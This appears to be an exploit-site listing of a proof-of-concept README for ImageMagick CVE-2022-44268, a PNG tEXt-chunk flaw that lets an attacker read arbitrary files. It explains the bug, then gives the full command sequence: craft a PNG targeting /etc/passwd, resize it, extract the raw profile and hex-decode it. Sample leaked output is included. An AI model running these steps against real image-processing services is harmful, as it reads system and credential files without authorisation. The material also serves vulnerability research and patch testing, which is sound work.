Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Imagemagick CVE-2022-44268

Name: Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Imagemagick CVE-2022-44268
Rating: 5 (183 reviews)

2023-07-03 | CVSS 6.5

## https://sploitus.com/exploit?id=C2673E45-A367-5DA4-AA91-110C67238C3A
# CVE-2022-44268

This repository contains a Proof of Concept (POC) for a vulnerability in [ImageMagick](https://github.com/ImageMagick/ImageMagick) (v. 7.1.0-49), a widely used open-source image manipulation library. The vulnerability allows an attacker to embed the content of an arbitrary file into a resized image when ImageMagick parses a PNG file.

## Description

When ImageMagick performs operations such as resizing on a PNG file, it may include the content of a system file, given that the magick binary has the necessary permissions to read it. This vulnerability arises due to the mishandling of textual chunks within PNG files.

A malicious actor can exploit this vulnerability by crafting a PNG file or using an existing one and adding a textual chunk type (tEXt). These chunks consist of a keyword and a text string. In this case, if the keyword matches the string "profile" (without quotes), ImageMagick will interpret the accompanying text string as a filename and attempt to load its content as a raw profile. As a result, when the resized image is downloaded, it will contain the content of the remote file specified by the attacker.

For more information, see [this article from MetabaseQ](https://www.metabaseq.com/imagemagick-zero-days/).

## Proof of Concept

To exploit Imagemagick, generate a malicious png: 

```shell
python3 CVE-2022-44268.py /etc/passwd  # Create output.png
```

Then, run a resize operation with convert:

```shell
convert output.png -resize 50% leak.png
```

Finally, inspect the leak image and convert the `Raw profile` to hex:

```shell
identify -verbose leak.png
# ...
Raw profile type:

    2367
726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]
```

```python
python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"
```

> Note: This POC is intended for educational and informational purposes only. Please ensure that you have the necessary permissions and legal authorization before testing or using this POC on any system.